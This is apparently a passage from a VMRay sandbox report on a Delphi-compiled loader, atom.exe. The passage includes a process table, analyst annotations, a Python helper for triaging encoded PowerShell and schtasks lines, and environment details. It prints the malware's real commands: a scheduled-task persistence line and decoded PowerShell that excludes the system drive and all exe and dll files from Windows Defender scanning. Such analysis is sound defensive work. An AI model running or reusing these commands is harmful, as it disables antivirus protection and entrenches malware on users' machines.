HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE} access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-0000-0000000FF1CE} access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-0000-0000000FF1CE}\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-0000-0000000FF1CE}\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4503575 access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4503575\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4503575\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F} access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9} access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB} access applaunch.exe CLEAN

Note on the registry rows: the atom.exe reads of HARDWARE\ACPI\DSDT\VBOX__, SystemBiosVersion, VideoBiosVersion and the display-adapter class DriverDesc are the usual VirtualBox / sandbox fingerprinting checks, and EnableLUA is a UAC-status check; the Borland\Delphi\Locales keys are touched by the Delphi runtime, which indicates a Delphi-compiled loader. The applaunch.exe walk of Uninstall\*\DisplayName and DisplayVersion enumerates installed software. The per-row CLEAN verdict rates the individual registry operation, not the behaviour it belongs to.

Reduced dataset Process

Process Name Commandline Verdict
atom.exe "C:\Users\kEecfMwgj\Desktop\atom.exe" MALICIOUS
applaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" SUSPICIOUS
build.exe "C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe" SUSPICIOUS
cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe" SUSPICIOUS
schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe" SUSPICIOUS
services.exe C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe SUSPICIOUS
cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAK... ...BuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit CLEAN
powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" CLEAN
powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" CLEAN
cmd.exe "cmd" cmd /c "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe" CLEAN

The two complete -EncodedCommand payloads above are base64 of UTF-16LE text (the spaces inside them in the source were inserted by line wrapping). Decoded, they are:

Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Add-MpPreference -ExclusionExtension @('exe','dll') -Force

That is, the user profile, the whole system drive, and every .exe and .dll are carved out of Windows Defender scanning before the dropped services.exe is started (ATT&CK T1562.001, Impair Defenses). The schtasks line registers a task named "services" that runs %APPDATA%\Microsoft\services.exe at every logon with the highest available run level (ATT&CK T1053.005, Scheduled Task). The CLEAN verdict on the PowerShell rows is the sandbox's per-process rating; the action itself is defense evasion and should be treated as such in triage.
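The following is an added triage helper, not part of the VMRay report and not VMRay code. It takes the command lines shown in the process table above (copied as constants, with the wrap spaces removed from the base64), decodes every PowerShell -EncodedCommand payload as base64 of UTF-16LE, flags Add-MpPreference exclusions, and pulls the schedule, run level, task name and action out of the schtasks /create line. The function names, the finding labels and the ATT&CK references in the comments are this example's own; the truncated "cmd" /c wrapper is left out because its elided payload cannot be decoded.

```python
"""Triage PowerShell -EncodedCommand payloads and schtasks persistence
from process command lines. Added example; not VMRay code."""
import base64
import binascii
import re

# Command lines copied from the process table above, with the line-wrap
# spaces that the PDF extraction inserted into the base64 removed. The
# "cmd" /c powershell wrapper whose payload the report elides with "..."
# is deliberately omitted: a truncated payload cannot be decoded.
SAMPLE_COMMANDLINES = [
    r'schtasks /create /f /sc onlogon /rl highest /tn "services" '
    r'/tr "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe"',
    'powershell -EncodedCommand "'
    'QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAa'
    'QBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlA'
    'CwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"',
    'powershell -EncodedCommand "'
    'QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAa'
    'QBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAn'
    'ACkAIAAtAEYAbwByAGMAZQA="',
    r'cmd /c "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe"',
]

# powershell.exe accepts -EncodedCommand and the short forms -e, -ec and
# -enc. The payload is base64 of the script encoded as UTF-16LE, which is
# why every second byte of the decoded data is NUL for an ASCII script.
ENCODED_RE = re.compile(
    r'(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+"?([A-Za-z0-9+/=]{8,})')

# schtasks switches of interest: schedule, run level, task name, action.
# Group 2 captures a quoted value, group 3 a bare one.
SCHTASKS_FLAG_RE = re.compile(r'(?i)/(sc|rl|tn|tr)\s+(?:"([^"]*)"|(\S+))')


def decode_encoded_command(cmdline):
    """Return the decoded script, or None if the line carries no
    -EncodedCommand. Raises ValueError when the payload is not valid
    base64/UTF-16LE, so a mangled payload is reported, not skipped."""
    m = ENCODED_RE.search(cmdline)
    if m is None:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"undecodable -EncodedCommand payload: {exc}") from exc


def parse_schtasks_create(cmdline):
    """Return {'sc': ..., 'rl': ..., 'tn': ..., 'tr': ...} for a
    'schtasks /create' line, or None for any other command line."""
    if not re.search(r'(?i)\bschtasks(?:\.exe)?\b.*\s/create\b', cmdline):
        return None
    flags = {}
    for flag, quoted, bare in SCHTASKS_FLAG_RE.findall(cmdline):
        flags[flag.lower()] = quoted if quoted else bare
    return flags


def triage(cmdline):
    """Map one command line to a list of (finding, detail) tuples."""
    findings = []
    try:
        script = decode_encoded_command(cmdline)
    except ValueError as exc:
        findings.append(("undecodable_encoded_command", str(exc)))
        script = None
    if script is not None:
        findings.append(("encoded_powershell", script))
        # Add-MpPreference -Exclusion* removes paths or file types from
        # Defender scanning (ATT&CK T1562.001, Impair Defenses).
        if re.search(r'(?i)\badd-mppreference\b.*-exclusion', script):
            findings.append(("defender_exclusion", script))
    task = parse_schtasks_create(cmdline)
    if task is not None:
        findings.append(("scheduled_task", task))
        # /sc onlogon with /rl highest runs the action at every logon with
        # the highest run level available (ATT&CK T1053.005, Scheduled Task).
        if task.get("sc", "").lower() == "onlogon" and task.get("rl", "").lower() == "highest":
            findings.append(("logon_persistence_highest", task.get("tr", "")))
        # An action living under a user's AppData tree is the usual dropper
        # location and deserves a look on its own.
        if re.search(r'(?i)\\appdata\\', task.get("tr", "")):
            findings.append(("task_runs_from_appdata", task["tr"]))
    return findings


def triage_all(cmdlines):
    """Triage every command line; only lines with findings are returned."""
    result = {}
    for cmdline in cmdlines:
        found = triage(cmdline)
        if found:
            result[cmdline] = found
    return result


if __name__ == "__main__":
    for cmdline, found in triage_all(SAMPLE_COMMANDLINES).items():
        print(cmdline[:70] + ("..." if len(cmdline) > 70 else ""))
        for kind, detail in found:
            print(f"  {kind}: {detail}")
```

The decoder deliberately validates the base64 (`validate=True`) and surfaces a decode failure as its own finding rather than returning None: in a report like this one, the payload that will not decode is usually the truncated or wrapped copy, and that is worth knowing about rather than silently skipping.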

YARA / AV

No YARA or AV matches available.


ENVIRONMENT

Virtual Machine Information
Name win7_64_sp1_en_mso2016
Description win7_64_sp1_en_mso2016
Architecture x86 64-bit
Operating System Windows 7
Kernel Version 6.1.7601.18741 (2e37f962-d699-492c-aaf3-f9f4e9770b1d)
Network Scheme Name Local Gateway
Network Config Name Local Gateway

Platform Information
Platform Version 4.4.0
Dynamic Engine Version 4.4.0 / 12/08/2021 19:04
Static Engine Version 4.4.0.0 / 2021-12-08 18:00:20
AV Exceptions Version 4.4.1.6 / 2021-12-14 15:06:27
Link Detonation Heuristics Version 4.4.1.7 / 2021-12-15 19:11:26
Smart Memory Dumping Rules Version 4.4.0.0 / 2021-12-08 18:00:20
Signature Trust Store Version 4.4.1.6 / 2021-12-14 15:06:27
VMRay Threat Identifiers Version 4.4.1.7 / 2021-12-15 19:11:26
YARA Built-in Ruleset Version 4.4.1.7

Software Information
Adobe Acrobat Reader Version Not installed
Microsoft Office 2016
Microsoft Office Version 16.0.4266.1003
Hangul Office Not installed
Hangul Office Version Not installed
Internet Explorer Version 8.0.7601.17514
Chrome Version Not installed
Firefox Version Not installed
Flash Version Not installed
Java Version Not installed

System Information
Sample Directory C:\Users\kEecfMwgj\Desktop
